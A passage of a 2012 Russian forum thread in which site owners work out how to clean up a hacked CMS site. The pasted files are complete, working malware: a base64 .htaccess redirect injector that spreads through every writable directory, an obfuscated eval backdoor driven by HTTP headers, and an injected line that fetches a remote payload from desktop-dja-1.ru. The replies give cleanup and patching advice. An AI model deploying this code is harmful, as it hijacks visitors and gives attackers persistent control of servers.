YmlsZSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBhbmRyb2lkIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IEFuZHJvaWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGRhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IFBQQyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBTZXJpZXM2MCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBPcGVyYS5NaW5pIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlwYWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaXBob25lIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlQYWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaVBob25lIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX0FDQ0VQVH0gInRleHQvdm5kLndhcC53bWx8YXBwbGljYXRpb24vdm5kLndhcC54aHRtbCt4bWwiIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICF3aW5kb3dzLm50IFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFic2QgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIXgxMSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhdW5peCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbWFjb3MgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIW1hY2ludG9zaCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhcGxheXN0YXRpb24gW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWdvb2dsZSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAheWFuZGV4IFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFib3QgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWxpYnd3dyBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbXNuIFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFhbWVyaWNhIFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFhdmFudCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhZG93bmxvYWQgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWZkbSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbWF1aSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhd2VibW9uZXkgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIXdpbmRvd3MtbWVkaWEtcGxheWVyIFtOQ10KClJld3JpdGVSdWxlIF4oLiopJCBodHRwOi8vbW9iaWxlLWRqYS0xLnJ1L2w9MzI0MTExMTkwNjZlMGI0ZDAzNTY0NTU2NDk1NDUzNDM3MyBbTCxSPTMwMl0KClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4xOTNcLjIwMVwuMig/OjI5fDNbMDFdKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTNcLjI0M1wuNjQgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeNDZcLjIyOVwuMSg/OjI4fDNbMjM0XXw0WzAxXSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODNcLjE0OVwuWzEyMzg5XSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF44M1wuMTQ5XC4oPzoyWzE0XXwzWzQtOF18NFszLTc5XXw1WzI2LTldfDZbMC0zXSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODNcLjE0OVwuNDhcLlswLTldIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjgzXC4xNDlcLjQ4XC5bMS05XVswLTldIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjgzXC4xNDlcLjQ4XC4xKD86WzAxXVswLTldfDJbMC03XSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODNcLjIyOVwuMjI0IFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjg1XC4yNlwuMSg/OjI4fDM2fDU1fDZbNDVdfDhbMzQ2XXw5WzItNV0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjg1XC4yNlwuMig/OjBbNDhdfDFbMjZdfDJbMDQ3LTldfDNbMC01XXw0WzE4XSkgW09SXQoKUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjgwXC44M1wuMig/OjI4fDNbMC0zXSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODBcLjgzXC4yKD86MjR8M1s3LTldKVwuWzAtOV0gW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODBcLjgzXC4yKD86MjR8M1s3LTldKVwuWzEtOV1bMC05XSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF44MFwuODNcLjIoPzoyNHwzWzctOV0pXC4xKD86WzAxXVswLTldfDJbMC03XSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODRcLjE3XC4yNVs0NV0gW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeOTVcLjE1M1wuMSg/Ols2LThdWzAtOV18OVswMV0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjk1XC4xNTNcLjI1WzItNV0gW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeMTk0XC41NFwuMSg/OjRbODldfDVbMDFdKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTNcLjg3IFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjIxN1wuOFwuMig/OjJbNi05XXwzWzAtNDldKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTdcLjY2XC4xKD86NFs2LTldfDVbMC0yNl0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjIxN1wuNzRcLjI0WzQ3XVwuMSg/OjJbODldfFszLTldWzAtOV0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjIxN1wuNzRcLjI0WzQ3XVwuMig/OlswLTRdWzAtOV18NVswLTVdKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTdcLjc0XC4yKD86NFs1ODldfDVbMDFdKQoKUmV3cml0ZVJ1bGUgXiguKikkIGh0dHA6Ly9tb2JpbGUtZGphLTEucnUvbD0zMjQxMTExOTA2NmUwYjRkMDM1NjQ1NTY0OTU0NTM0MzczIFtMLFI9MzAyXQoKUmV3cml0ZUNvbmQgJXtIVFRQX1JFRkVSRVJ9ICh5YXx5YW5kZXh8Z29vZ2xlfG1haWx8cmFtYmxlcnx2aykgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIShhY2Nvb25hfGlhX2FyY2hpdmVyfGFudGFib3R8YXNrXCBqZWV2ZXN8YmFpZHV8ZGNwYm90fGVsdGFpbmRleGVyfGZlZWRmZXRjaGVyfGdhbWVzcHl8Z2lnYWJvdHxnb29nbGVib3R8Z3NhLWNyYXdsZXJ8Z3J1Yi1jbGllbnR8Z3VscGVyfHNsdXJwfG1paGFsaXNtfG1zbmJvdHx3b3JsZGluZGV4ZXJ8b295eW98cGFnZWJ1bGx8c2Nvb3Rlcnx3M2NfdmFsaWRhdG9yfGppZ3Nhd3x3ZWJhbHRhfHlhaG9vZmVlZHNlZWtlcnx5YWhvbyFcIHNsdXJwfG1tY3Jhd2xlcnx5YW5kZXhib3R8eWFuZGV4aW1hZ2VzfHlhbmRleHZpZGVvfHlhbmRleG1lZGlhfHlhbmRleGJsb2dzfHlhbmRleGFkZHVybHx5YW5kZXhmYXZpY29uc3x5YW5kZXhkaXJlY3R8eWFuZGV4bWV0cmlrYXx5YW5kZXhjYXRhbG9nfHlhbmRleG5ld3N8eWFuZGV4aW1hZ2VyZXNpemVyKSBbTkNdClJld3JpdGVSdWxlIF4oLiopJCBodHRwOi8vZGVza3RvcC1kamEtMS5ydS9nby9pbi5waHA/c291cmNlPSV7SFRUUF9IT1NUfSBbTCxSPTMwMl0KCg=='; function editexistinghtacc($scanedPath) { global $codes; if($arr_filesAndDirsInScanedPath = scandir($scanedPath)) { foreach($arr_filesAndDirsInScanedPath as $fileOrDirInScanedPath) { $path = $scanedPath . $fileOrDirInScanedPath; if($fileOrDirInScanedPath == ".." || $fileOrDirInScanedPath == ".") continue; if(@is_dir($path)) editexistinghtacc($path.DIRECTORY_SEPARATOR); if(@is_writable($path) && strpos($path, "htaccess")) { if (! file_get_contents($path)) { $filetext = base64_decode($codes); $fh = fopen($path, "w"); fwrite($fh, $filetext); fclose($fh); } if(! strpos(file_get_contents($path), 'desktop-dja')) { $filetext = base64_decode($codes).file_get_contents($path); $fh = fopen($path, "w"); fwrite($fh, $filetext); fclose($fh); } } } } } $keywords = preg_split("#/#", dirname(__FILE__)); $size = count($keywords); for ($i=1; $i < $size; $i++) { for ($j=1; $j < $size+1-$i; $j++) { $url.=$keywords[$j]; $url.="/"; } editexistinghtacc('/'.$url); $url=null; } function createnewhtacc($scanedPath) { global $codes; if($arr_filesAndDirsInScanedPath = scandir($scanedPath)) { foreach($arr_filesAndDirsInScanedPath as $fileOrDirInScanedPath) { $path = $scanedPath . $fileOrDirInScanedPath; if($fileOrDirInScanedPath == ".." || $fileOrDirInScanedPath == ".") continue; if(! @is_dir($path)) continue; if(@is_writable($path)) { if (! file_get_contents($path.'/.htaccess')) { $filetext = base64_decode($codes); $fh = fopen($path.'/.htaccess', "w"); fwrite($fh, $filetext); fclose($fh); } if(! strpos(file_get_contents($path.'/.htaccess'), 'desktop-dja')) { $filetext = base64_decode($codes).file_get_contents($path.'/.htaccess'); $fh = fopen($path.'/.htaccess', "w"); fwrite($fh, $filetext); fclose($fh); } } createnewhtacc($path.DIRECTORY_SEPARATOR); } } } $keywords = preg_split("#/#", dirname(__FILE__)); $size = count($keywords); for ($i=1; $i < $size; $i++) { for ($j=1; $j < $size+1-$i; $j++) { $url.=$keywords[$j]; $url.="/"; } createnewhtacc('/'.$url); $url=null; } echo 'OK'; ?> q00p.php -а этот файл я нге смог открыть произошло вот что : 84331ba7.php <?php $_5a2760="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_5a2760("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?> Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
_Dark_ Опубликовано 2 декабря, 2012 Поделиться Опубликовано 2 декабря, 2012 Ну удаляйте эти странные файлы. И они не только в папке /cache/ будут. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Pashok(one) Опубликовано 2 декабря, 2012 Поделиться Опубликовано 2 декабря, 2012 Ну удаляйте эти странные файлы. И они не только в папке /cache/ будут. Я нашёл его! w00t.php ============================================================================== ========================= END =================================== ========================= /forum/index.php?<?error_reporting(0);print(___);copy('__desktop-dja-1.ru/go/greed.txt','q00p.php');die;?> =================================== ============================================================================== А что за файл Thumbs.db в /admin Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
MasteR Опубликовано 2 декабря, 2012 Поделиться Опубликовано 2 декабря, 2012 Решение проблемы: Небольшое пояснение: Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
_Dark_ Опубликовано 2 декабря, 2012 Поделиться Опубликовано 2 декабря, 2012 Решение проблемы: ТЫК Небольшое пояснение: ТЫК Это не точно. В ноябре были найдены новые уязвимости, 3.3.4 уязвима (без патча), через эти уязвимости и заражают сайт. Для начала нужно убрать все лишнее из папки /cache/ (чаще всего там находится шелл), после этого нужно очистить .htaccess, а потом удалить все лишнее файлы со всех директорий. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
MasteR Опубликовано 2 декабря, 2012 Поделиться Опубликовано 2 декабря, 2012 _Dark_, Где почитать и скачать этот патч? Просто когда находят уязвимость то уведомление в админке большое. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
_Dark_ Опубликовано 2 декабря, 2012 Поделиться Опубликовано 2 декабря, 2012 (изменено) Почитать Скачать по последней ссылке можно. Изменено 2 декабря, 2012 пользователем _Dark_ Не ту ссылку дал Pashok(one) и MasteR 2 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Respected Опубликовано 2 декабря, 2012 Поделиться Опубликовано 2 декабря, 2012 Кстати, если практически в каждой папке находится "чужой" htaccess, думаю вряд ли кто-то захочет просматривать каждую папку движка. Самый рациональный выход, на мой взгляд, сделать дамп файлов, с помощью стандартных средств поиска в Windows найти все эти файлы и просто удалить их. Затем закачать дамп. Pashok(one) 1 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quicksdk Опубликовано 20 декабря, 2012 Автор Поделиться Опубликовано 20 декабря, 2012 UP. Только что заметил, что был взломан поддомен blog.pro-ucheba.com (на wordpress) с такими же симптомами. В каждой папке находится чужой htaccess. Возникает вопрос: взлом видимо был осуществлен - через хостинг? т.е. взломщик знал пароли или ... Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Respected Опубликовано 20 декабря, 2012 Поделиться Опубликовано 20 декабря, 2012 Значит злоумышленник получил доступ на сервер, больше это ничем не объяснить.. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quicksdk Опубликовано 20 декабря, 2012 Автор Поделиться Опубликовано 20 декабря, 2012 Хм... интересно... У меня хостинг был от Timeweb. Это как он смог получить доступ? Он взломал именно определенный сервер? Или как? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Respected Опубликовано 20 декабря, 2012 Поделиться Опубликовано 20 декабря, 2012 Этого я не могу сказать, советую поменять все пароли, в том числе и от базы данных. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.